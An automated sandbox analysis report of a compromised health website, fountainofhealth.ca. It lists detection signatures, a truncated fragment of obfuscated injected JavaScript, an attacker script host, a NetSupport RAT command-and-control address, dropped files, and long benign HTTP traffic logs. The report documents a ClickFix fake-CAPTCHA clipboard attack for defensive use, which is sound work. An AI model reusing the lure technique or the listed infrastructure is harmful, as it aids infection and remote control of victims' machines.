Windows Analysis Report
http://fountainofhealth.ca

General Information

Sample URL: http://fountainofhealth.ca
Analysis ID: 1704307
Infos: yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 96
Range: 0 - 100
Confidence: 100%

Signatures

Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Installs a global event hook (focus changed)
Installs a global keyboard hook
Obfuscated command line found
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

AV Detection

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe ReversingLabs: Detection: 16%

Phishing

Source: Yara match File source: 0.6.pages.csv, type: HTML
Source: 0.355..script.csv Joe Sandbox AI: detected suspicious Javascript with a risk score 93.0%.
Source: 0.351..script.csv Joe Sandbox AI: detected suspicious Javascript with a risk score 86.8%.
Source: https://3dmaine.com/d.js HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
Source: https://fountainofhealth.ca/en HTTP Parser: Base64 decoded: 1748893175.000000
Source: https://fountainofhealth.ca/en HTTP Parser: No favicon
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.168.117.169:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source: Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Networking

Source: Network traffic Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:51757 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2062663 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (3dmaine .com) : 192.168.2.16:49722 -> 107.180.51.102:443
Source: Network traffic Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:61172 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49773 -> 94.158.245.140:443
Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.16:49773 -> 94.158.245.140:443
Source: global traffic HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic HTTP traffic detected: GET /chrome-variations/seed?osname=win&channel=stable&milestone=134 HTTP/1.1host: clientservices.googleapis.comif-none-match: SMChYyMDI1MDMwNi0xODMwMDQuNDI5MDAwEgkIABADGIYBIAA=#qBr8j3G36+k=a-im: x-bm,gzipsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdpriority: u=4, i
Source: global traffic HTTP traffic detected: GET / HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /en HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /cdn-cgi/speculation HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: speculationrulesreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swwsy8 HTTP/1.1
  host: fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: same-origin
  sec-fetch-mode: no-cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/en
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1
  host: cdn.jsdelivr.net
  origin: https://fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1
  host: cdn.jsdelivr.net
  origin: https://fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: text/css,*/*;q=0.1
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: style
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=0

Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1
  host: cdn.jsdelivr.net
  origin: https://fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: script
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9
  priority: u=2

Source: global traffic HTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
  host: static.cloudflareinsights.com
  origin: https://fountainofhealth.ca
  sec-ch-ua-platform: "Windows"
  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  accept: */*
  sec-fetch-site: cross-site
  sec-fetch-mode: cors
  sec-fetch-dest: script
  referer: https://fountainofhealth.ca/
  accept-encoding: gzip, deflate, br, zstd
  accept-language: en-US,en;q=0.9

Source: global traffic HTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1
  host: www.youtube.com
  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  upgrade-insecure-requests: 1
